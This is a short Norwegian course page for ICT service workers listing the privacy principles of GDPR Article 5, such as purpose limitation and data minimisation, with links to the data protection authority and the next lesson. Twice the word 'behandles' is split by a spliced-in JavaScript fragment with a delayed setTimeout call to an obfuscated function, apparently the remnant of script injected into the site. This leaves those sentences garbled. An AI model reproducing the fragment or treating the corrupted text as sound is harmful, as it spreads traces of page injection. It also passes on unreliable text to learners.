4.4.1 Personvernprinsippene

Personvernprinisppene er definert i personopplysningsloven artikkel 5.
De oppsummerer hvordan personopplysninger skal behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andles i praksis.
Du bør kjenne til personvernprinsippene, og hvordan de skal etterleves i praksis.
Personvernprinsippene definerer rammene for hvordan du som IKT-servicemedarbeider skal behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle personopplysninger.

Personvernprinsippene:

  • Lovlig, Rettferdig og Gjennomsiktig
  • Formålsbegrensning
  • Dataminimering
  • Riktighet
  • Lagringsbegrensning
  • Integritet og Konfidensialitet
  • Ansvarlighet


Datatilsynet om Personvernprinsippene


Personopplysningsloven om Personvernprinsippene


Klikk her for neste post: 4.4.2 Virksomhetens plikter